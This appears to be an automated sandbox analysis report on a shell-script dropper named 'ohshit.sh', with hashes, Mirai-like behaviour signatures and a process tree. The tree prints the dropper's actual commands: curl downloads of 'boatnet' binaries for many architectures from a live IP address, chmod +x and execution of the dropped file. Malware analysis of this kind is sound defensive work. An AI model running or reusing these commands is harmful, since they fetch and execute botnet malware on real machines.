Analysis
-
max time kernel
61s -
max time network
67s -
platform
debian-12_mipsel -
resource
debian12-mipsel-20240729-en -
resource tags
arch:mipselimage:debian12-mipsel-20240729-enkernel:6.1.0-17-4kc-maltalocale:en-usos:debian-12-mipselsystem -
submitted
31-08-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
ohshit.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
ohshit.sh
Resource
ubuntu2004-amd64-20240729-en
Behavioral task
behavioral8
Sample
ohshit.sh
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
fefdf2b7ece4d55bd47778b420f84011
-
SHA1
2823096e0538910f9b57ff9bae007ec655520fc3
-
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
-
SHA512
b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures
-
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/WTF 790 WTF /tmp/WTF 798 WTF /tmp/WTF 804 WTF /tmp/WTF 810 WTF /tmp/WTF 815 WTF /tmp/WTF 820 WTF /tmp/WTF 826 WTF /tmp/WTF 836 WTF /tmp/WTF 846 WTF /tmp/WTF 855 WTF /tmp/WTF 865 WTF /tmp/WTF 874 WTF /tmp/WTF 884 WTF /tmp/WTF 895 WTF -
Modifies Watchdog functionality 1 TTPs 16 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 1 TTPs 16 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/30/status WTF File opened for reading /proc/16/status WTF File opened for reading /proc/847/status WTF File opened for reading /proc/698/status WTF File opened for reading /proc/6/status WTF File opened for reading /proc/698/status WTF File opened for reading /proc/405/status WTF File opened for reading /proc/858/status WTF File opened for reading /proc/829/status WTF File opened for reading /proc/2/status WTF File opened for reading /proc/11/status WTF File opened for reading /proc/28/status WTF File opened for reading /proc/23/status WTF File opened for reading /proc/31/status WTF File opened for reading /proc/15/status WTF File opened for reading /proc/866/status WTF File opened for reading /proc/11/status WTF File opened for reading /proc/695/status WTF File opened for reading /proc/868/status WTF File opened for reading /proc/869/status WTF File opened for reading /proc/33/status WTF File opened for reading /proc/675/status WTF File opened for reading /proc/118/status WTF File opened for reading /proc/111/status WTF File opened for reading /proc/751/status WTF File opened for reading /proc/843/status WTF File opened for reading /proc/392/status WTF File opened for reading /proc/27/status WTF File opened for reading /proc/112/status WTF File opened for reading /proc/663/status WTF File opened for reading /proc/53/status WTF File opened for reading /proc/5/status WTF File opened for reading /proc/885/status WTF File opened for reading /proc/24/status WTF File opened for reading /proc/843/status WTF File opened for reading /proc/10/status WTF File opened for reading /proc/837/status WTF File opened for reading /proc/34/status WTF File opened for reading /proc/35/status WTF File opened for reading /proc/1/status WTF File opened for reading /proc/827/status WTF File opened for reading /proc/25/status WTF File opened for reading /proc/862/status WTF File opened for reading /proc/875/status WTF File opened for reading /proc/392/status WTF File opened for reading /proc/840/status WTF File opened for reading /proc/674/status WTF File opened for reading /proc/53/status WTF File opened for reading /proc/698/status WTF File opened for reading /proc/17/status WTF File opened for reading /proc/35/status WTF File opened for reading /proc/113/status WTF File opened for reading /proc/59/status WTF File opened for reading /proc/675/status WTF File opened for reading /proc/675/status WTF File opened for reading /proc/24/status WTF File opened for reading /proc/30/status WTF File opened for reading /proc/833/status WTF File opened for reading /proc/7/status WTF File opened for reading /proc/16/status WTF File opened for reading /proc/9/status WTF File opened for reading /proc/840/status WTF File opened for reading /proc/837/status WTF File opened for reading /proc/870/status WTF -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.arm7 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:742 -
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:749
-
-
/usr/bin/catcat boatnet.x862⤵PID:788
-
-
/usr/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-timedated.service-9uBzHH WTF2⤵PID:789
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:790
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:793
-
-
/usr/bin/catcat boatnet.mips2⤵PID:796
-
-
/usr/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:797
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:798
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/catcat boatnet.arc2⤵PID:802
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:803
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:804
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:807
-
-
/usr/bin/catcat boatnet.i4682⤵PID:808
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:809
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:810
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:812
-
-
/usr/bin/catcat boatnet.i6862⤵PID:813
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:814
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:815
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:817
-
-
/usr/bin/catcat boatnet.x86_642⤵PID:818
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:819
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:820
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:823
-
-
/usr/bin/catcat boatnet.mpsl2⤵PID:824
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:825
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:826
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:832
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:835
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:836
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:842
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:845
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:846
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:854
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:855
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:861
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:864
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:865
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:871
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:873
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:874
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:881
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:883
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:884
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:891
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF2⤵PID:894
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:895
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ba2cb5b8715ba94c39e24e75a34d0ea0
SHA17182bf3b0e14e5224e741c15174c6e93f00df444
SHA25601fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA5120c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d